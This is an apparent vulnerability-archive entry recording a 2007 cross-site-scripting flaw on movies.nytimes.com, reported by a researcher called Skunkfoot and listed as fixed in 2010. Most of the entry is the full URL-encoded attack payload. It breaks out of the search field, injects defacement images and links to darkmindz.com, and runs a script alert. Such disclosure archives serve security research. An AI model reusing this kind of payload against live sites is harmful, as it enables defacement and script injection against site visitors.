Security researcher Skunkfoot, has submitted on 25/10/2007 a cross-site-scripting (XSS) vulnerability affecting movies.nytimes.com, which at the time of submission ranked 219 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 04/11/2007. It is currently fixed. |
Date submitted: 25/10/2007 |
Date published: 04/11/2007 |
Date fixed: 29/08/2010 | Status: FIXED |
Author: Skunkfoot |
Domain: movies.nytimes.com |
Category: XSS |
Pagerank: 219 |
URL: http://movies.nytimes.com/gst/movies/msearch.html?query=%22%3E%3Ctitle%3E--%3D%5B+Skunkfoot+%7C%7C+X SS+%7C%7C+Think+Dark+%5D%3D--%3C%2Ftitle%3E%3Cp+align%3Dcenter%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.darkmi ndz.com%3E%3Cimg+border%3D0+src%3Dhttp%3A%2F%2Fwww.darkmindz.com%2Fimg%2Fdark_pixel.jpg+width%3D700+ height%3D240%3E%3C%2Fa%3E%3C%2Fp%3E%3Cp+align%3Dcenter%3E%3Ca+href%3Dhttp%3A%2F%2Fdarkmindz.com%2Fus er%2Fview%2FSkunkfoot%3E%3Cb%3E%3Cfont+face%3DVerdana+size%3D4%3E+--%3D%5B+Skunkfoot+%7C%7C+XSS+%7C% 7C+Think+Dark+%5D%3D--+%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fa%3E%3C%2Fp%3E%3Cp+align%3Dcenter%3E%3Cb%3E%3Cfo nt+face%3DVerdana+size%3D4%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.darkmindz.com%3E%3Cfont+color%3D%23FF0000% 3E--%3D%5B+Darkmindz.com+%5D%3D--%3C%2Ffont%3E%3C%2Fa%3E%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fp%3E%3Cscript%3 Ealert%28%22--%3D%5B+Skunkfoot+%7C%7C+XSS+%7C%7C+Think+Dark+%5D%3D--%22%29%3C%2Fscript%3E&x=0&y=0 |
Click here to view the mirror
|
|
|